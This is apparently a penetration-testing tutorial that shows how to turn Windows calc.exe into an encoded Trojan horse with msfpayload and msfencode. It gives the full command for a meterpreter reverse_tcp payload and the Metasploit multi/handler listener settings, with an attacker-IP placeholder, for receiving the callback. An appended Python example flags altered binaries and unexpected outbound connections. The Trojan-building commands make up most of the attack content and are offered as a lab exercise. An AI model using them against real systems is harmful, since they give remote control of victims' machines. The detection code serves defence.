Creating Trojan Horse (Encoded) By Using Msfpayload

MODULE 13:- Metasploit Framework


In this article I am going to teach you how to create a Trojan horse using msfpayload and encode it with msfencode. One very important point first: msfpayload and msfencode no longer exist. I did not remove this article because some people are still using old Kali Linux versions. If you want to read the new article, I have written it separately.

New Article

MSFvenom replacement of MSFpayload and msfencode – Full guide  

Creating Trojan horse

The backdoors in the previous sections run entirely in the background and do not interact with the user logged into the system at the time. A Trojan horse gives the appearance of a functional program that the user may want to use. This guide was created using the calc.exe application from a Microsoft Windows XP, Service Pack 3 platform. For this exercise to work correctly, the calc.exe application must be copied to an external thumb drive.

Not all binaries on the Windows platform are susceptible to Trojanization. For example, if the calc.exe application from a Windows 7 Ultimate platform were used, this attack would not execute at all. Other considerations are the amount of encoding used, active firewalls, IDS (Intrusion Detection System), and cryptosystems. Not every executable will work; Trojanization of an executable is a trial-and-error, research process, best suited for a lab.

#msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -x /root/Desktop/calc.exe -o /root/Desktop/encodeTrojancalc.exe


The figure shows the output from creating the trojan-cmd-payload.exe Trojan horse from a Windows calc.exe binary. The Trojan horse made from the Windows binary calc.exe can be transferred to an exploited machine by various methods.


Set Up a Metasploit Listener:

The backdoor and Trojan horse that were made are client-side attacks and call home for further instructions. The security analyst will need to set up a listener in Metasploit to answer the call. The multi-handler inside Metasploit is a glorified voice mail for a Trojan or backdoor to call home and get further instructions.


>use exploit/multi/handler

>set PAYLOAD windows/meterpreter/reverse_tcp

>set LHOST {Attacker_IP}

>set LPORT 4444



The figure shows the setup of a listener on Metasploit and a callback from a backdoor. The connection was produced when the unencoded-payload.exe application was executed on the exploited victim's operating system.
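From the defender's side, a Trojanized copy of a utility such as calc.exe differs from the vendor binary in its hash and, once run, opens an outbound connection that the real calculator never would. The following added example (not part of the original article) checks both signals over constructed endpoint events; the event fields, the baseline and the list of offline utilities are assumptions.

```python
import hashlib
import ntpath  # parses Windows paths on any OS

# Constructed stand-ins for file contents; real use would hash files on disk.
GOOD_CALC = hashlib.sha256(b"constructed: vendor calc.exe").hexdigest()
ALTERED_CALC = hashlib.sha256(b"constructed: modified calc.exe").hexdigest()
BROWSER = hashlib.sha256(b"constructed: browser.exe").hexdigest()
NOTEPAD = hashlib.sha256(b"constructed: notepad.exe").hexdigest()

# Known-good hashes per file name (assumed to come from a trusted OS image).
BASELINE = {"calc.exe": {GOOD_CALC}}
# Utilities with no reason to open outbound connections (assumption).
OFFLINE_UTILITIES = {"calc.exe", "notepad.exe"}

# Constructed events: a process image, its hash, and an optional outbound
# connection (dst is None when the process made no connection).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\calc.exe", "sha256": GOOD_CALC, "dst": None},
    {"image": r"E:\calc.exe", "sha256": ALTERED_CALC, "dst": ("192.0.2.10", 443)},
    {"image": r"C:\Program Files\Browser\browser.exe", "sha256": BROWSER,
     "dst": ("198.51.100.7", 443)},
    {"image": r"C:\Windows\System32\notepad.exe", "sha256": NOTEPAD,
     "dst": ("192.0.2.10", 4444)},
]


def triage(events, baseline=BASELINE, offline=OFFLINE_UTILITIES):
    """Return (image, reasons) for every event that trips at least one check."""
    findings = []
    for ev in events:
        name = ntpath.basename(ev["image"]).lower()
        reasons = []
        known = baseline.get(name)
        # Same file name as a baselined binary, but different content.
        if known is not None and ev["sha256"] not in known:
            reasons.append("hash-mismatch")
        # An offline utility initiating any outbound connection is anomalous.
        if name in offline and ev.get("dst") is not None:
            reasons.append("unexpected-network")
        if reasons:
            findings.append((ev["image"], reasons))
    return findings


if __name__ == "__main__":
    for image, reasons in triage(SAMPLE_EVENTS):
        print(f"ALERT {image}: {', '.join(reasons)}")
```
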

Vijay Kumar

Ethical Hacking & Penetration Testing Trainer, For more detail view My Profile
